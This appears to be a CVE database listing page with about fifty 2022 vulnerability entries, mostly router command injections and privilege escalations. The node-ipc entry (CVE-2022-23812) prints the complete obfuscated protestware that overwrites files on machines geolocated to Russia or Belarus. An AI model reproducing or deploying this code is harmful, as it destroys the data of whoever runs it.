Search
Total
201818 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2022-22578 | 1 Apple | 5 Ipados, Iphone Os, Macos and 2 more | 2023-08-08 | 9.3 HIGH | 7.8 HIGH |
| A logic issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. A malicious application may be able to gain root privileges. | |||||
| CVE-2022-26501 | 1 Veeam | 1 Backup \& Replication | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Veeam Backup & Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2). | |||||
| CVE-2022-26526 | 2 Anaconda, Conda | 2 Anaconda3, Miniconda3 | 2023-08-08 | 4.6 MEDIUM | 7.8 HIGH |
| Anaconda Anaconda3 (Anaconda Distribution) through 2021.11.0.0 and Miniconda3 through 4.11.0.0 can create a world-writable directory under %PROGRAMDATA% and place that directory into the system PATH environment variable. Thus, for example, local users can gain privileges by placing a Trojan horse file into that directory. (This problem can only happen in a non-default installation. The person who installs the product must specify that it is being installed for all users. Also, the person who installs the product must specify that the system PATH should be changed. | |||||
| CVE-2022-23812 | 1 Node-ipc Project | 1 Node-ipc | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; | |||||
| CVE-2021-39712 | 1 Google | 1 Android | 2023-08-08 | 4.4 MEDIUM | 6.4 MEDIUM |
| In TBD of TBD, there is a possible user after free vulnerability due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176918884References: N/A | |||||
| CVE-2021-39708 | 1 Google | 1 Android | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| In gatt_process_notification of gatt_cl.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206128341 | |||||
| CVE-2022-27002 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-27001 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the dhcp function via the hostname parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-27000 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the time and time zone function via the h_primary_ntp_server, h_backup_ntp_server, and h_time_zone parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-26999 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the static ip settings function via the wan_ip_stat, wan_mask_stat, wan_gw_stat, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-26998 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the wps setting function via the wps_enrolee_pin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-26997 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the upnp function via the upnp_ttl parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-26996 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pppoe function via the pppoe_username, pppoe_passwd, and pppoe_servicename parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-26995 | 1 Commscope | 2 Arris Tr3300, Arris Tr3300 Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pptp (wan_pptp.html) function via the pptp_fix_ip, pptp_fix_mask, pptp_fix_gw, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-26991 | 1 Arris | 6 Sbr-ac1200p, Sbr-ac1200p Firmware, Sbr-ac1900p and 3 more | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ntp function via the TimeZone parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-26990 | 1 Arris | 6 Sbr-ac1200p, Sbr-ac1200p Firmware, Sbr-ac1900p and 3 more | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the firewall-local log function via the EmailAddress, SmtpServerName, SmtpUsername, and SmtpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-26206 | 1 Totolink | 12 A3000ru, A3000ru Firmware, A3100r and 9 more | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setLanguageCfg, via the langType parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | |||||
| CVE-2022-27193 | 1 Cvrf-csaf-converter Project | 1 Cvrf-csaf-converter | 2023-08-08 | 4.3 MEDIUM | 5.5 MEDIUM |
| CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter. | |||||
| CVE-2022-21187 | 1 Libvcs Project | 1 Libvcs | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| The package libvcs before 0.11.1 are vulnerable to Command Injection via argument injection. When calling the update_repo function (when using hg), the url parameter is passed to the hg clone command. By injecting some hg options it was possible to get arbitrary command execution. | |||||
| CVE-2022-22344 | 1 Ibm | 1 Spectrum Copy Data Management | 2023-08-08 | 4.3 MEDIUM | 6.1 MEDIUM |
| IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 220038 | |||||
| CVE-2022-0907 | 4 Debian, Fedoraproject, Libtiff and 1 more | 4 Debian Linux, Fedora, Libtiff and 1 more | 2023-08-08 | 4.3 MEDIUM | 5.5 MEDIUM |
| Unchecked Return Value to NULL Pointer Dereference in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f2b656e2. | |||||
| CVE-2021-33150 | 1 Intel | 419 Atom C2308, Atom C2316, Atom C2338 and 416 more | 2023-08-08 | 4.6 MEDIUM | 6.8 MEDIUM |
| Hardware allows activation of test or debug logic at runtime for some Intel(R) Trace Hub instances which may allow an unauthenticated user to potentially enable escalation of privilege via physical access. | |||||
| CVE-2022-24433 | 1 Simple-git Project | 1 Simple-git | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| The package simple-git before 3.3.0 are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options it was possible to get arbitrary command execution. | |||||
| CVE-2022-26143 | 1 Mitel | 2 Micollab, Mivoice Business Express | 2023-08-08 | 9.0 HIGH | 9.8 CRITICAL |
| The TP-240 (aka tp240dvr) component in Mitel MiCollab before 9.4 SP1 FP1 and MiVoice Business Express through 8.1 allows remote attackers to obtain sensitive information and cause a denial of service (performance degradation and excessive outbound traffic). This was exploited in the wild in February and March 2022 for the TP240PhoneHome DDoS attack. | |||||
| CVE-2022-25215 | 1 Phicomm | 10 K2, K2 Firmware, K2g and 7 more | 2023-08-08 | 5.0 MEDIUM | 5.3 MEDIUM |
| Improper access control on the LocalMACConfig.asp interface allows an unauthenticated remote attacker to add (or remove) client MAC addresses to (or from) a list of banned hosts. Clients with those MAC addresses are then prevented from accessing either the WAN or the router itself. | |||||
| CVE-2022-25214 | 1 Phicomm | 10 K2, K2 Firmware, K2g and 7 more | 2023-08-08 | 5.8 MEDIUM | 7.4 HIGH |
| Improper access control on the LocalClientList.asp interface allows an unauthenticated remote attacker to obtain sensitive information concerning devices on the local area network, including IP and MAC addresses. Improper access control on the wirelesssetup.asp interface allows an unauthenticated remote attacker to obtain the WPA passphrases for the 2.4GHz and 5.0GHz wireless networks. This is particularly dangerous given that the K2G setup wizard presents the user with the option of using the same password for the 2.4Ghz network and the administrative interface, by clicking a checkbox. When Remote Managment is enabled, these endpoints are exposed to the WAN. | |||||
| CVE-2022-25213 | 1 Phicomm | 10 K2, K2 Firmware, K2g and 7 more | 2023-08-08 | 7.2 HIGH | 6.8 MEDIUM |
| Improper physical access control and use of hard-coded credentials in /etc/passwd permits an attacker with physical access to obtain a root shell via an unprotected UART port on the device. The same port exposes an unauthenticated Das U-Boot BIOS shell. | |||||
| CVE-2022-22814 | 1 Asus | 1 Myasus | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| The System Diagnosis service of MyASUS before 3.1.2.0 allows privilege escalation. | |||||
| CVE-2022-20053 | 2 Google, Mediatek | 60 Android, Mt6731, Mt6732 and 57 more | 2023-08-08 | 7.2 HIGH | 7.8 HIGH |
| In ims service, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06219097; Issue ID: ALPS06219097. | |||||
| CVE-2022-20049 | 2 Google, Mediatek | 21 Android, Mt6779, Mt6785 and 18 more | 2023-08-08 | 4.6 MEDIUM | 6.7 MEDIUM |
| In vpu, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05954679; Issue ID: ALPS05954679. | |||||
| CVE-2022-23266 | 1 Microsoft | 1 Defender For Iot | 2023-08-08 | 7.2 HIGH | 7.8 HIGH |
| Microsoft Defender for IoT Elevation of Privilege Vulnerability | |||||
| CVE-2022-21967 | 1 Microsoft | 2 Windows 10, Windows 11 | 2023-08-08 | 4.4 MEDIUM | 7.0 HIGH |
| Xbox Live Auth Manager for Windows Elevation of Privilege Vulnerability | |||||
| CVE-2022-26318 | 1 Watchguard | 1 Fireware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. | |||||
| CVE-2022-22706 | 1 Arm | 3 Bifrost, Midgard, Valhall | 2023-08-08 | 4.6 MEDIUM | 7.8 HIGH |
| Arm Mali GPU Kernel Driver allows a non-privileged user to achieve write access to read-only memory pages. This affects Midgard r26p0 through r31p0, Bifrost r0p0 through r35p0, and Valhall r19p0 through r35p0. | |||||
| CVE-2022-23849 | 1 Devolutions | 1 Password Hub | 2023-08-08 | 4.6 MEDIUM | 6.6 MEDIUM |
| The biometric lock in Devolutions Password Hub for iOS before 2021.3.4 allows attackers to access the application because of authentication bypass. An attacker must rapidly make failed biometric authentication attempts. | |||||
| CVE-2022-22300 | 1 Fortinet | 2 Fortianalyzer, Fortimanager | 2023-08-08 | 6.5 MEDIUM | 8.8 HIGH |
| A improper handling of insufficient permissions or privileges in Fortinet FortiAnalyzer version 5.6.0 through 5.6.11, FortiAnalyzer version 6.0.0 through 6.0.11, FortiAnalyzer version 6.2.0 through 6.2.9, FortiAnalyzer version 6.4.0 through 6.4.7, FortiAnalyzer version 7.0.0 through 7 .0.2, FortiManager version 5.6.0 through 5.6.11, FortiManager version 6.0.0 through 6.0.11, FortiManager version 6.2.0 through 6.2.9, FortiManager version 6.4.0 through 6.4.7, FortiManager version 7.0.0 through 7.0.2 allows attacker to bypass the device policy and force the password-change action for its user. | |||||
| CVE-2022-25359 | 1 Iclinks | 3 Scadaflex Ii, Scadaflex Ii Firmware, Weblib | 2023-08-08 | 6.4 MEDIUM | 9.1 CRITICAL |
| On ICL ScadaFlex II SCADA Controller SC-1 and SC-2 1.03.07 devices, unauthenticated remote attackers can overwrite, delete, or create files. | |||||
| CVE-2022-25262 | 1 Jetbrains | 1 Hub | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| In JetBrains Hub before 2022.1.14434, SAML request takeover was possible. | |||||
| CVE-2022-25064 | 1 Tp-link | 2 Tl-wr840n, Tl-wr840n Firmware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a remote code execution (RCE) vulnerability via the function oal_wan6_setIpAddr. | |||||
| CVE-2022-25061 | 1 Tp-link | 2 Tl-wr840n, Tl-wr840n Firmware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_setIp6DefaultRoute. | |||||
| CVE-2022-25060 | 1 Tp-link | 2 Tl-wr840n, Tl-wr840n Firmware | 2023-08-08 | 10.0 HIGH | 9.8 CRITICAL |
| TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_startPing. | |||||
| CVE-2021-22437 | 1 Huawei | 2 Emui, Magic Ui | 2023-08-08 | 6.9 MEDIUM | 7.0 HIGH |
| There is a software integer overflow leading to a TOCTOU condition in smartphones. Successful exploitation of this vulnerability may cause random address access. | |||||
| CVE-2022-24331 | 1 Jetbrains | 1 Teamcity | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| In JetBrains TeamCity before 2021.1.4, GitLab authentication impersonation was possible. | |||||
| CVE-2022-25640 | 1 Wolfssl | 1 Wolfssl | 2023-08-08 | 5.0 MEDIUM | 7.5 HIGH |
| In wolfSSL before 5.2.0, a TLS 1.3 server cannot properly enforce a requirement for mutual authentication. A client can simply omit the certificate_verify message from the handshake, and never present a certificate. | |||||
| CVE-2022-25084 | 1 Totolink | 2 T6, T6 Firmware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| TOTOLink T6 V5.9c.4085_B20190428 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. | |||||
| CVE-2022-25083 | 1 Totolink | 2 A860r, A860r Firmware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| TOTOLink A860R V4.1.2cu.5182_B20201027 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. | |||||
| CVE-2022-25082 | 1 Totolink | 2 A950rg, A950rg Firmware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. | |||||
| CVE-2022-25081 | 1 Totolink | 2 T10 V2, T10 V2 Firmware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| TOTOLink T10 V5.9c.5061_B20200511 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. | |||||
| CVE-2022-25080 | 1 Totolink | 2 A830r, A830r Firmware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| TOTOLink A830R V5.9c.4729_B20191112 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. | |||||
| CVE-2022-25079 | 1 Totolink | 1 A810r Firmware | 2023-08-08 | 7.5 HIGH | 9.8 CRITICAL |
| TOTOLink A810R V4.1.2cu.5182_B20201026 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. | |||||